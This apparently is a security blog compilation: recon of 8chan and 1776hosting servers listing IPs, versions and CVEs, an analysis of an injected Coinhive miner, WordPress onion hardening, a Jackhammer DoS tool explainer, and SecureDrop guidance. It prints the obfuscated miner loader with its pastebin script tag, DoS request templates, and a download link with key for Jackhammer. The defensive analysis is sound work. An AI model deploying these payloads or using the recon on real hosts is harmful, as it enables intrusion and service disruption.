Fascist Hosting Company 1776hosting.com

AS397702 1776 Solutions, LLC

IP Addresses: 256

Netblock: 103.114.191.0/24

Hosted Domains
There are 9 domain names hosted across 13 IP addresses on this ASN.

103.114.191.1 RouterOS v6.45.3 http://103.114.191.1
103.114.191.30 1776hosting.com
103.114.191.34 https://mail.jaw.sh
103.114.191.36 https://103.114.191.36 Kiwi FOSS
103.114.191.37 kfcdn.xyz
103.114.191.40 https://riot.kiwifarms.net, matrix.kiwifarms.net
103.114.191.41 https://www.lolcow.tv
103.114.191.47 nginx [ssl:autodelete.kiwifarms.net]
103.114.191.55 9chan (Cloudflare), 9chan.hk
103.114.191.56 9chan (Cloudflare)

103.114.191.129 [503 Service Unavailable] democratieparticipative.website
103.114.191.132 [NS_ERROR_NET_ON_TRANSACTION_CLOSE] sonichu.com
103.114.191.139 https://mirror.bullshit.agency
103.114.191.144 https://103.114.191.144 [400 Bad Request]
103.114.191.145 CentOS [ssl:wiki.onaforums.net]
103.114.191.153 https://onaforums.net [Apache]
103.114.191.154 Apache2 Debian [action-zealandia.com]
103.114.191.156 nginx [ssl:brooklynfink.com]
103.114.191.168 Freech Enterprises LTD https://lsxsnow6jabasmfaioc6hmxlzqld45tbppc474rm2kswpslbybttylqd.onion
103.114.191.235 9chan (Cloudflare) [possibly principal live site]
103.114.191.245 9chan (Cloudflare) [possibly also ninechnjd5aaxfbcsszlbr4inp7qjsficep4hiffh4jbzovpt2ok3cad.onion]

A Quick Look into 8 Chan – IP Map

8chan is hosted in Reno, USA, at N.T. Technology Inc. They employ a range of servers to host 8chan, including a mail server and various mirror servers. 8chan is a service that masquerades as a free-speech platform but in reality is purpose built to recruit, train and mobilise ethno-nationalist and alt-right extremists.

8chan employs the services of Cloudflare, which protects their terrorism-spawning platform from DDoS attacks.

For a look into their other websites, see: EXCLUSIVE: How money flows from Amazon to 8chan

What is more interesting than staring at Cloudflare servers are the actual 8chan web servers themselves. Below is a little map of their current setup, which will likely change in the coming days.

Warning: This may bore you to death

  • https://whois.arin.net/rest/org/NTTECH-1.html
    Jim Watkins and his son run this little private server farm.
  • https://whois.arin.net/rest/poc/TW488-ARIN.html
  • Netblock NET-206-223-144-0-1 (Hosts 8ch.net) Info
  • https://whois.arin.net/rest/net/NET-206-223-144-0-1.html
  • IP Block: 206.223.144.0 – 206.223.159.255

Production Servers

Server IP: 206.223.147.150

  • Server: nginx/1.11.3
  • Mail server
  • X-Powered-By: PHP/5.4.16
  • mail.8ch.net
  • SSH-2.0-OpenSSH_6.6.1
  • Open ports: 22, 25, 80, 110, 143, 993, 995 and 5353 (Multicast DNS)

Observation: This is obviously a mail server, and the software is very out of date.

Server IP: 206.223.147.210

  • Not properly bound to 8chan
  • Server: nginx/1.8.0
  • SSH-2.0-OpenSSH_6.6.1_hpn13v11 FreeBSD-20140420

Observation: It is likely that this is the principal server.

Server IP: 206.223.147.236

  • Bound to 8chan.net
  • Server: nginx/1.14.0
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Server IP: 206.223.147.215

  • redirects to 8chan.net
  • Server: nginx/1.8.1
  • OpenSSH NULL

Server IP: 206.223.147.222

  • redirects to 8chan.net
  • Server: nginx/1.10.1
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Live Static Archives:

  • These appear to be static HTML snapshots of the live site
  • PHP scripting is disabled

206.223.147.214

  • Server: nginx/1.8.1
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

206.223.147.217

  • Server: nginx/1.14.0
  • SSH-2.0-OpenSSH_7.5 FreeBSD-20170903

206.223.147.218

  • CVE-2018-15919
  • CVE-2018-15473
  • CVE-2017-15906
  • Server: nginx/1.14.0
  • SSH-2.0-OpenSSH_7.5 FreeBSD-20170903

206.223.147.221

  • Server: nginx/1.11.2
  • SSH-2.0-OpenSSH_7.5 FreeBSD-20170903

======================================

Other servers of interest in this IP range (but not necessarily 8CH):

206.223.156.246

  • ESMTP Postfix (Ubuntu)
  • Server: nginx/1.4.6 (Ubuntu)

206.223.147.211

  • Server: nginx
  • Port 123 is open: NTP
  • Port 443 is open
  • Port 5353 is open: Multicast DNS (a Mac workstation?)
  • Port 8080 is open: http://206.223.147.211:8080 => see below
  • Port 9306 is open: database port, probably bound locally

Observation: This looks like a remote workstation

http://206.223.147.211:8080

  • Server: nginx
  • This server likely does the archiving / static page generation
  • https://gitgud.io/Sapphire/FutaBilly

206.223.147.213

  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

206.223.147.219

  • Port 22 open
  • CVE-2016-8858
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Observation: SSH servers?

206.223.147.220

  • CVE-2016-8858
  • SSH-2.0-OpenSSH_7.2 FreeBSD-20160310

Observation: SSH servers?

206.223.147.227

  • Meow
  • Server: Apache/2.4.7 (Ubuntu)
  • SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8

Why you should ditch Cloudflare

Cloudflare is a network provider offering a reverse proxy, pass-through service. Apart from some terrible security practices (for example, because TLS terminates at Cloudflare's proxy, Cloudflare can see your passwords even if you use SSL certificates [https://]), Cloudflare also does the following:

  • Shields criminal webmasters by hiding their IP address from the public.

The example most on our minds at the moment is the massacre of worshippers at several mosques in Christchurch, Aotearoa New Zealand by a white supremacist terrorist who had used 8chan as a launch pad for his terror. Cloudflare, while fully aware of the activities that occur on 8chan, and even after this took place on their client's web platform, continues to offer them IP shielding, protecting the very existence of 8chan and allowing users free rein to plan, strategise and refine the tactics of their next mass shooting.

What can you do?

Check whether your company or web server uses Cloudflare, and ditch them. They are not an essential service for 99% of their customers, who use the service more because of the company's scareware tactics.

How can I find out if my website is using Cloudflare?

Check to see if your domain name is in the following list of 10,078 websites that use Cloudflare:

If it is, and you are familiar with DNS, you can either log into your web service control panel and follow their instructions on how to disconnect the service (essentially resetting your domain's name servers back to their original settings), or contact your web host's help and support centre and request instructions or assistance to remove the service.

Analysis of an embedded javascript cryptocurrency miner malware

Unfortunately, weak content management system security combined with Coinhive has made it quite easy for attackers to embed cryptocurrency miners into web pages. Using obfuscated code, malware authors are able to insert JavaScript into pages that evades detection.

Browser users can install add-ons that blacklist access to the Coinhive JavaScript libraries and the many duplicates that are popping up, but much like antivirus, these merely block known versions.

Example Attack Code Remote Repository:

https://pastebin.com/raw/RNsgLpRs

Use: Embedded into web pages

<script type='text/javascript' src="https://pastebin.com/raw/RNsgLpRs"></script>

Payload:

(function (id) {
    // Obfuscated markup: every character is one code point above the real one
    var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!~*<njofs/tubsu)*<=0tdsjqu?";
    var res = "";
    var stringLength = s.length;
    var flag = false;
    for (var i = 0; i < stringLength; i++) {
        // 40 is '(' in the shifted text, i.e. a quote of the empty '' argument:
        // the site key (id) is spliced in at the first one, the second is dropped
        if (s.charCodeAt(i) == 40) {
            if (flag) continue;
            res += "\'" + id;
            flag = true;
        }
        res += String.fromCharCode(s.charCodeAt(i) - 1); // shift every character back by one
    }
    document.write(res);
})
('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw'); // I assume this is here for the attacker's own reference...lol

1) var s is the main payload string.

2) s.charCodeAt(i)-1 recodes the string s into Unicode code points, each "shifted" by -1:

60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,99,111,105,
110,104,105,118,101,46,99,111,109,47,108,105,98,47,99,111,105,110,104,105,118,101,46,109,
105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,32,
118,97,114,32,109,105,110,101,114,32,61,32,110,101,119,32,67,111,105,110,72,105,118,101,
46,65,110,111,110,121,109,111,117,115,40,39,39,44,32,123,32,116,104,114,111,116,116,108,
101,58,32,48,46,50,32,125,41,59,109,105,110,101,114,46,115,116,97,114,116,40,41,59,60,47,
115,99,114,105,112,116,62

3) The fromCharCode() method converts the code points back into characters, giving:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw',
{ throttle: 0.2 });miner.start();</script>
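A Python decoder and indicator extractor for the loader analysed above, added here as an example and not part of the original analysis. The obfuscated string and site key are the ones from the payload on this page; the static loader heuristic at the end is an assumption about what a scanner would look for.

```python
import re

# The obfuscated string s and the site key (id) carried by the loader analysed above.
OBFUSCATED = (
    "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?"
    "=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!"
    "~*<njofs/tubsu)*<=0tdsjqu?"
)
SITE_KEY = "i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw"


def decode_payload(s: str, site_key: str) -> str:
    """Replay the loader: every character is shifted down one code point (steps 2
    and 3 above) and the site key is spliced into the empty '' argument. In the
    shifted text that argument appears as '((' (code 40): the first '(' becomes
    the opening quote plus the key, the second '(' is skipped entirely."""
    out = []
    key_inserted = False
    for ch in s:
        if ord(ch) == 40:
            if key_inserted:
                continue
            out.append("'" + site_key)
            key_inserted = True
        out.append(chr(ord(ch) - 1))
    return "".join(out)


# Indicators a defender wants out of the decoded markup.
MINER_PATTERNS = {
    "loader_script": re.compile(r'<script[^>]*\ssrc=["\']([^"\']*coinhive\.min\.js)["\']', re.I),
    "site_key": re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]+)['\"]", re.I),
    "throttle": re.compile(r"throttle\s*:\s*([0-9.]+)"),
}


def extract_indicators(html: str) -> dict:
    """Return the miner library URL, site key and throttle found in decoded markup."""
    found = {}
    for name, pattern in MINER_PATTERNS.items():
        match = pattern.search(html)
        if match:
            found[name] = match.group(1)
    return found


# Constructed excerpt of the loader itself, for the static heuristic below.
LOADER_EXCERPT = "res += String.fromCharCode(s.charCodeAt(i)-1);\ndocument.write(res);"
LOADER_SHAPE = re.compile(r"fromCharCode\([^)]*charCodeAt\(\w+\)\s*-\s*1\s*\)")


def looks_like_shift_loader(js: str) -> bool:
    """Assumed scanner heuristic (not from the post): a charCodeAt()-1 shift fed
    straight into String.fromCharCode and then written out with document.write."""
    return LOADER_SHAPE.search(js) is not None and "document.write" in js


if __name__ == "__main__":
    decoded = decode_payload(OBFUSCATED, SITE_KEY)
    print(decoded)
    print(extract_indicators(decoded))
    print(looks_like_shift_loader(LOADER_EXCERPT))
```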

For browser prevention

For Firefox: Nominer
For Chrome: No Coin

For Website Injection Prevention

To prevent rogue code being injected into your website files, or unauthorised files being added to your Content Management System (CMS) file repository, keep your CMS, themes and plugins up to date, choose themes and plugins carefully, and use secure web hosting.

Some security add-ons like Pareto Security can capture attempts to append code to WordPress files, but none of these are as effective as following the above advice.

Defeating fingerprinting scanning of onion websites running WordPress:

This is not a discussion about detecting whether a Tor hidden service website has WordPress installed, but rather about tricking attackers who scan your website into moving along: nothing interesting here.

For starters, if you are running multiple onion websites on a single web server (and my recommendation is that you do not do this; use one website per web server), you will need to make sure that your server is not vulnerable to an attack in which an attacker can enumerate all the onion sites running on it.

So don't be lazy: set the ServerName of your VirtualHost containers correctly!

That said (and this is the point of this little blog piece), even if you have configured this correctly, WordPress has recently added a function that inserts an extra 'dns-prefetch' link into the page code. In itself this is not interesting, except that it could cause your onion site to be short-listed for further attention by attackers scanning for virtual host misconfigurations, because this new addition to WordPress can trigger a false positive.

For example, if an attacker were to trace:

$ curl -H "Host: abcdefghijklm.onion" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum

(note: even though SHA-1 is vulnerable to collision attacks, we use it here merely for illustration, i.e. as a short hash)

This returns:
5f18492f012c9e1d0df76c47d4a7b75c703ae6c3 -

Same trace instead using localhost as the hostname:
$ curl -H "Host: localhost" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum

Returns:
4d0389cf2c7e362fa5b3d920c8c6c394f5d0d021 -

This is because WordPress adds an extra:

<link rel='dns-prefetch' href='//abcdefghijklm.onion/' />

…when the trace hostname is localhost.

To prevent this, go to:
wp-content/themes/[current-theme]_child/functions.php

add:
remove_action('wp_head', 'wp_resource_hints', 2);

Now trace:

$ curl -H "Host: localhost" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum
5f18492f012c9e1d0df76c47d4a7b75c703ae6c3 -

And:

$ curl -H "Host: abcdefghijklm.onion" --socks5-hostname 127.0.0.1:9050 -s --user-agent "Mozilla/5.0" abcdefghijklm.onion | sha1sum
5f18492f012c9e1d0df76c47d4a7b75c703ae6c3 -

Hashes match! Your site is not interesting, attacker moves along…
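An offline version of the two-Host comparison above, added as an example and not the post's own tooling: it fingerprints each response body the way sha1sum does and also names the hosts that WordPress resource hints volunteer, so you can see why two traces differ. The onion hostname and the response bodies are constructed.

```python
import hashlib
import re
from html.parser import HTMLParser

ONION = "abcdefghijklm.onion"   # placeholder hostname, as in the post


class ResourceHintParser(HTMLParser):
    """Collect hostnames from <link rel="dns-prefetch"> tags (and the other hints
    wp_resource_hints emits: preconnect, prefetch, prerender)."""
    HINTS = {"dns-prefetch", "preconnect", "prefetch", "prerender"}

    def __init__(self):
        super().__init__()
        self.hosts = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        attr = dict(attrs)
        rel = set((attr.get("rel") or "").lower().split())
        href = (attr.get("href") or "").strip()
        if rel & self.HINTS:
            m = re.match(r"(?:https?:)?//([^/\s]+)", href)
            if m:
                self.hosts.append(m.group(1).lower())


def resource_hint_hosts(html: str) -> list:
    parser = ResourceHintParser()
    parser.feed(html)
    return parser.hosts


def leaked_hosts(host_header: str, html: str) -> list:
    """Hostnames the page volunteers that differ from the Host header we sent."""
    return sorted({h for h in resource_hint_hosts(html) if h != host_header.lower()})


def body_fingerprint(html: str) -> str:
    """Same fingerprint as piping the body through sha1sum."""
    return hashlib.sha1(html.encode("utf-8")).hexdigest()


def compare_traces(traces: dict) -> tuple:
    """traces maps the Host header used -> response body. Returns
    (all bodies identical?, {host header: hostnames leaked in that body})."""
    digests = {host: body_fingerprint(body) for host, body in traces.items()}
    leaks = {host: leaked_hosts(host, body) for host, body in traces.items()}
    return len(set(digests.values())) == 1, leaks


# Constructed bodies: the onion Host gets a clean page, "localhost" gets the
# extra dns-prefetch link WordPress adds, exactly the difference described above.
HEAD = "<html><head><title>blog</title>"
TAIL = "</head><body><p>hello</p></body></html>"
BEFORE_FIX = {
    ONION: HEAD + TAIL,
    "localhost": HEAD + "<link rel='dns-prefetch' href='//" + ONION + "/' />" + TAIL,
}
AFTER_FIX = {ONION: HEAD + TAIL, "localhost": HEAD + TAIL}   # wp_resource_hints removed


if __name__ == "__main__":
    print(compare_traces(BEFORE_FIX))   # (False, {...'localhost': ['abcdefghijklm.onion']})
    print(compare_traces(AFTER_FIX))    # (True, {... no leaks ...})
```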

Mauriora!

Hokioi Security OPSEC practices


Hardware Security:

  • Hard drives are encrypted with unique pass phrases
  • Servers protected by pfSense hardware firewalls

Operating Systems:

  • Client OS: TAILS
  • TAILS USBs are destroyed regularly with a grinder and ‘soaked’

Communications Security:

Information Security:

  • Pass phrases are spread across multiple end-to-end encrypted, remotely stored password databases
  • No sensitive information is stored on any inhouse devices
  • Personal data is stored on an airgapped offline computer
  • Hokioi Security Canary Statement


Mitigating Jackhammer 1.2 website traumatising tool styled attacks


What is Jackhammer 1.2?

Jackhammer 1.2 (sometimes called Jackhammer 2.0) was developed in 2003 by Mike Parniak (Archon) from TheBlackHand / Cafe Counterintelligence, in response to a CCISecurity script he released that blocked attacks from Jackhammer 1.0.

Jackhammer is an MS Windows-only, layer 7 attack application that also allows attackers to use multiple anonymous proxies to distribute the perceived point of origin of an attack across as many proxies as an attacker desires or is able to use, thereby masking the originating IP address of the attacker.

Attackers are able to choose from a number of attack strategies, allowing them to tweak the exact type of attack that Jackhammer performs as well as to optimise the overall data transfer, i.e. 10,000 proxies x 0.1 ms = 1 request per 1000 seconds per proxy.

While Jackhammer is an old application, its attack method is still as relevant today as it was in 2003. With the advent of flood protection services such as Cloudflare, Jackhammer attacks are easily thwarted, but without employing such services, web servers are still quite vulnerable to the attacks that can be delivered via Jackhammer.

Jackhammer 1.2 Connection Strategies:

* Disconnect after Response Code: On this setting, Jackhammer only reads the first 12 bytes of the web server's response, in order to get its HTTP response code. This is mostly used in conjunction with the "Disable proxies on Bad Response Code" option. It lets Jackhammer detect if a proxy has been banned (403 code) or similar, and thus disable now-useless proxies during a flood.
* Disconnect on any data received: As soon as data is received from the proxy server, indicating a response to Jackhammer's request, Jackhammer destroys the socket to avoid further data (minimising received data, but ensuring that the proxy is responding).
* Hold connection until disconnected: This setting has Jackhammer sit on the socket and not disconnect it. Only if Jackhammer needs to create a new socket and is maxed out, or if the remote host disconnects it, will Jackhammer destroy a socket. This setting is often best used in conjunction with a slow speed to run a web server out of connections.
* Disconnect after data sent: A low-bandwidth lifesaver. This option causes Jackhammer to disconnect immediately after successfully sending all the header data to the proxy. Tests have shown that the proxy will still deliver the request to the target server before disconnecting. This means it is a good option to use against scripts, but a poor option against large files.
* Incremental List Segments: If an attacker has a large list of proxies and is worried that the website they are flooding may ban the proxies as they are flooding, the attacker can have Jackhammer use only pieces of the proxy list at a time.
* Get and use initial cookies: One of the other powerful options in Jackhammer is the ability to get and store the cookies that websites return and pass them along on future connections. If an attacker enables this option, then the first time each proxy performs a request, Jackhammer waits for the full response header and records all the cookies. From this point on, it adds a Cookie: line with those cookies to all requests from that proxy.
* Get, use, and keep cookies updated: This option only works if the attacker also has the above option enabled. Instead of just waiting for the first set of cookies, Jackhammer will always read the full header and update the cookies accordingly.

An attacker can use these combinations of attacks to simulate expected traffic but at such a scale as to cause a denial of service condition, and in some cases, with little bandwidth consumption.

Example Low Bandwidth GET Request Attack:
For example, where a CMS creates guest sessions and stores them in its database keyed in this manner:

$guesthash = sha1( $_SERVER[ 'HTTP_USER_AGENT' ] . $ip );

Attack Method: Disconnect after data sent

GET http://attackvictim.com/?%%ALPHANUM[4,10]%%=%%ALPHANUM[4,10]%% HTTP/1.1
Accept: */*
Host: %%HOST%%
User-Agent: Mozilla/4.0 %%ALPHANUM[4,10]%%
X-Forwarded-For: %%IP%%

Then the above attack request would quickly fill a database with junk guest sessions, in many cases overwhelming the database with very little data sent, due to the ability to customise the User-Agent with every request.

Add to that the ridiculously shitty way in which, for example, vBulletin determines the real IP address of a visitor in its fetch_alt_ip() function (includes/class_core.php), and it is even possible to spoof the IP address with every request as well.

Resource Intensive Request Attacks:

Because Jackhammer allows for custom HTTP header requests, an attacker will often look for the most CPU/memory intensive, and/or bandwidth intensive request as their choice of attack.

POST requests: these are CPU intensive and the favourite of attackers. Unprotected forms are the usual target, and a flood of even a few requests per second can overwhelm a web server.

Forms that result in an email or emails being sent are especially damaging: they can overwhelm a server's resources and also create a bandwidth attack, as mass amounts of email are generated from each POST request.

However, there are other POST requests that can overwhelm a server even without a waiting form.

For example, versions of PHP earlier than 5.4 were very susceptible to blind POST request attacks where the POST data generates a large multidimensional array:

i[]=1&i[]=2&i[]=3&i[]=4....i[]=1000

GET requests: often targeted at site features like search functions, where a search request results in a database-intensive query which, repeated in quick succession, can quickly overwhelm a database server's resources.

Example GET request of a search function using wild cards:

GET http://attackvictim.com/?search=a*&%%ALPHANUM[4,10]%%=%%ALPHANUM[4,10]%% HTTP/1.1
Accept: */*
Host: %%HOST%%
User-Agent: Mozilla/5.0
Client-IP: %%IP%%

GET request attacks targeting large files can also result in a bandwidth attack sufficient to cause a denial of service condition.

Mitigation:

How to mitigate Jackhammer-type attacks (in this example using PHP and optionally JavaScript) without ceding to the likes of Cloudflare or other captcha services/methods:

One approach to mitigate an attack from tools like Jackhammer is to enumerate the ways in which these tools fail to emulate a standard browser as a means of detecting them as the source of an HTTP request.

Most layer 7 HTTP request attack tools cannot interpret JavaScript, so it is possible for a server to ask a complex JavaScript-initiated question that a standard browser with JavaScript enabled would be able to answer.

For example, you could write a piece of JavaScript to set a session, which a standard web browser would have no trouble completing but an attack tool like Jackhammer could not.

JavaScript, though, is not preferable for some web admins.

The usual method is session-based IP management that counts requests per period of time and restricts IP addresses that break these rules.

A Jackhammer attack is often mistaken as a botnet attack because Jackhammer allows an attacker to deploy multiple proxies.

An attacker with a very large proxy list can deliver a sizeable attack even against rate-limiting algorithms because of the time it would take for Jackhammer to toggle through a very large list.

The time between the first and second request from a specific proxy IP address of an attacker employing say 10,000 anonymous proxies could be 5 minutes.

Combined with JavaScript as noted above, this will very likely prevent an attack from proceeding.

Lastly, it is important to prevent direct access to large files on a server; it is preferable to pipe a file via session-based access, which is subject to the same browser emulation requirements stated above.
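An added Python sketch of the rate-limiting part of this mitigation (it is not the post's own PHP). The request templates above vary User-Agent and X-Forwarded-For on every request, so both the limiter and the guest-session key must be built from an address the attacker cannot choose. The trusted proxy address, the limits and the flood are constructed; the JavaScript challenge is left out.

```python
import hashlib
from collections import defaultdict, deque

# Constructed: only our own reverse proxy may speak for the client. Any other
# peer's X-Forwarded-For / Client-IP is attacker-controlled (the %%IP%% token).
TRUSTED_PROXIES = {"10.0.0.5"}


def client_ip(remote_addr: str, headers: dict) -> str:
    """Address to key sessions and limits on. The forwarded header is honoured
    only when the TCP peer is a proxy we run, and then only its last hop, which
    that proxy appended itself; everything else in the header is untrusted."""
    if remote_addr in TRUSTED_PROXIES:
        forwarded = headers.get("X-Forwarded-For", "")
        if forwarded:
            return forwarded.split(",")[-1].strip()
    return remote_addr


class SlidingWindowLimiter:
    """Allow at most `limit` requests per key inside a rolling window."""

    def __init__(self, limit: int, window_seconds: float):
        self.limit = limit
        self.window = window_seconds
        self.hits = defaultdict(deque)

    def allow(self, key: str, now: float) -> bool:
        q = self.hits[key]
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def guest_session_key(ip: str, user_agent: str) -> str:
    """The CMS scheme from the post, sha1(UA . ip); with a trustworthy ip the
    number of junk sessions one attacker can create is bounded by the limiter."""
    return hashlib.sha1((user_agent + ip).encode("utf-8")).hexdigest()


def handle_request(remote_addr, headers, now, limiter, sessions, trust_header_blindly=False):
    """Return True if the request is served (and a guest session stored)."""
    if trust_header_blindly:   # the vBulletin-style mistake: believe any forwarded header
        ip = headers.get("X-Forwarded-For", remote_addr)
    else:
        ip = client_ip(remote_addr, headers)
    if not limiter.allow(ip, now):
        return False
    sessions.add(guest_session_key(ip, headers.get("User-Agent", "")))
    return True


def run_flood(requests: int, trust_header_blindly: bool) -> tuple:
    """Constructed flood: one real source address, a fresh UA and a spoofed
    forwarded IP on every request, 10 requests per second. Returns
    (requests served, junk guest sessions created)."""
    limiter = SlidingWindowLimiter(limit=20, window_seconds=60)
    sessions = set()
    served = 0
    for i in range(requests):
        headers = {
            "User-Agent": "Mozilla/4.0 %08d" % i,
            "X-Forwarded-For": "198.51.100.%d" % (i % 250),
        }
        served += handle_request("203.0.113.7", headers, i * 0.1, limiter, sessions, trust_header_blindly)
    return served, len(sessions)


if __name__ == "__main__":
    print("trusting the header:", run_flood(200, True))    # every request served, 200 junk sessions
    print("keying on the peer:", run_flood(200, False))    # capped at the limit of 20
```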

Download Jackhammer 1.2 for testing purposes only: https://mega.nz/#!fII2BKpZ
Decryption key: !CEFrXPHEbzFD2XdxIbpRRdhJjCHd1AifiCc256LwB3I

Further security considerations when hosting a SecureDrop or Globaleaks server


If you are a journalist organisation with a central office situated in a country that respects the role of journalists, then you may quite comfortably run a SecureDrop or Globaleaks server within the offices of your organisation and depend on journalistic privilege to prevent governments from entering your offices and walking out with your secure dead drop servers, forcing you to hand over the application's GPG key (in the case of SecureDrop, where encrypting with a journalist's GPG key is left up to the source), or placing gag orders on you.

Be careful though: many states will selectively respect the rights of journalists depending on the size and power of the news network. For example, even in Aotearoa New Zealand the police have few qualms about raiding the houses of independent journalists, as was the case with investigative journalist Nicky Hager in 2014.

If your threat model means that keeping the location of your dead drop secret is also critical, then you should consider taking additional steps to protect your tor hidden service IP and therefore location from being discovered.

Hosting a secure dead drop:
Never run your SecureDrop or Globaleaks server on a VPS or any other form of remote hosting. There have been too many instances of virtual server vulnerabilities as well as malicious VPS providers. The most secure option is dedicated hardware in a secure premises.

Also avoid single point of failure services like load balancing methods which attempt to cloud host SecureDrop or Globaleaks servers. That also goes for applications that remote host the private keys. Avoid these.

Prevent guard node attacks:
There are a few types of attacks that target the relays which your SecureDrop or Globaleaks server connects to. Their purpose is to deanonymise your server, and they can also be used to attempt to identify who is connecting to your service.

To mitigate this attack you will have to consider running your own anonymous relays as dedicated entry nodes for your SecureDrop or Globaleaks server.

When these are safely configured, your SecureDrop or Globaleaks server can then be set to select its entry guard node only from those stipulated in the torrc file. If these relays come under attack, your dead drop will simply become unavailable rather than shifting to relays that could potentially be under the control of an attacker.
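A torrc fragment illustrating the guard pinning just described, added here as an example rather than taken from the post or from the SecureDrop/Globaleaks documentation; the directory, port and relay fingerprints are placeholders.

```text
# Onion service definition (directory and port are placeholders)
HiddenServiceDir /var/lib/tor/deaddrop/
HiddenServicePort 80 127.0.0.1:8080

# Keep persistent entry guards, and only ever pick them from the relays you run.
# The fingerprints are 40-hex-digit placeholders; use your own relays' identity keys.
UseEntryGuards 1
EntryNodes $0000000000000000000000000000000000000001,$0000000000000000000000000000000000000002

# If none of the listed relays is reachable, Tor has no permitted first hop, so
# the service goes offline rather than falling back to a guard you do not control.
```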

Do not draw attention to your Tor Hidden Service:
Make sure the IP address of a Tor hidden service does not behave in a way dissimilar to a standard user of Tor; then an attacker will not be able to easily determine that there is a Tor hidden service running (i.e. do not run any other service on the IP of your Tor hidden service, as these may draw attention to your specific IP address).

It is also good practice to run your SecureDrop or Globaleaks server on a separate internet connection from your organisation's own corporate network connection.

Choosing the right secure submission system for your organisation


To begin, first read @yawnbox’s excellent piece on this.

Choosing which secure source submission platform is right for you. I want to add some additional thoughts on the differences (while hopefully not regurgitating too much of what has already been covered by @yawnbox).

SecureDrop

SecureDrop in my opinion is designed and best suited with medium to large sized news media organisations in mind. If you are an established news media organisation and are seeking the most secure anonymous platform to manage newsroom sources, then you should look at deploying a SecureDrop platform.

SecureDrop requires a greater investment in equipment to meet its minimum requirements, and experienced Linux administrators to maintain and operate it.

With SecureDrop, the administrator must be in-house.

SecureDrop does not require the source to have a javascript enabled TorBrowser in order to interact with the server and upload documents.

SecureDrop does offer the source the option to manually pre-encrypt files with the journalist's PGP key before uploading; without this, though, a file is still encrypted with the application's own dedicated PGP key. This means any person or persons with the pass phrase of the application's PGP key can decrypt uploaded files.

SecureDrop's technical strength is its NSA-level hardened threat model, reducing the attack surface to the bare minimum. The security practices stipulated in the SecureDrop wiki documentation should be used by all journalists when handling secure information.

However, at a certain level it also depends on a country's ruling government respecting the rights of journalists. For example, a government that does not respect these rights could force the administrators to hand over the application's PGP keys, thus being able to decrypt any files still resident on the SecureDrop, or future submissions if the organisation is forced to continue running the SecureDrop under duress.

Globaleaks

Globaleaks was designed to scale from a single journalist/receiver through to as many journalists/receivers as your server can handle, using the least amount of equipment: a single web server (and an optional additional hardware firewall, which is my professional recommendation).

Globaleaks requires the source to have a javascript enabled TorBrowser.

A Globaleaks administrator does not have to be in-house in order to configure administrative settings.

A Globaleaks source's files are first temporarily encrypted with a symmetric AES key before being encrypted with the journalist's own PGP key (the recommended deployment method). Therefore at no time are the files stored on the server in unencrypted form. This also means only *that* specified journalist can decrypt files sent to them.

An encrypted email notification can be configured to be sent to the corresponding journalist/receiver when a submission is made.

A Globaleaks server can be more securely deployed in a country/region that has no respect for journalistic privilege, or used for non-journalist deployments using standard compartmentalisation methods. If the server location is compromised, a state actor cannot get access to the encrypted files. Getting access to source content files is only possible if they de-anonymise the journalists/receivers AND get access to their PGP private key pass phrase, in which case only the files of those individual journalists/receivers that are still resident on the server will be compromised, rather than all files.

Common to Both

Both platforms deploy on the Tor network to provide a layer of anonymity and end to end encryption as well as some protection of the location of the secure dead drop systems.

Both allow for multiple receivers/journalists.

Like any webserver system, they need an administrator to keep the physical equipment’s OS and applications up to date.

Both Globaleaks and SecureDrop can be deployed into an already compromised network, as is the case with many established news organisations; this is due to the SecureDrop-recommended pfSense hardware firewall being used with either choice.

Drawbacks

Many journalists still struggle with basic encryption issues. Using TAILS correctly and with persistence configured correctly, takes time to learn, and get used to if you do not use it regularly. PGP crypto is difficult to get right and clunky to use.

SecureDrop

So, as is the case with some deployments of SecureDrop, often the administrator or an onsite security specialist is employed to take on the role of "file decrypter" rather than the journalists performing this function. Once decrypted, files are analysed, then encrypted by this person with the PGP keys of the nominated journalist before being forwarded to them.

Globaleaks

Globaleaks' documented security requirements for journalists/receivers are low. Therefore I encourage journalists/receivers to use the same standards required of SecureDrop journalists/receivers. Under security best practices they would only ever access the Globaleaks journalist/receiver login area via a dedicated TAILS laptop, and decrypt files via a dedicated airgapped (never used on the internet or networked) TAILS laptop.

Globaleaks also demands that sources enable JavaScript in their Tor Browsers. This can be off-putting for the more security-minded sources. Also, some browsers like Orfox do not have the ability to enable JavaScript and are therefore blocked from interacting with a Globaleaks server.

My Analysis of the Rawshark Hack of Cameron Slater’s Communications


What I want to discuss here is the attack on the WhaleOil communications network which resulted in a large cache of emails and attachments becoming the centrepiece of Nicky Hager’s book Dirty Politics.

I hope that you the readers, bloggers and users of online services will learn from the mistakes Cameron Slater made, and harden your web applications to minimise the chances of this happening to you.

I will also try to keep this as non-techie and non-geeky as possible …

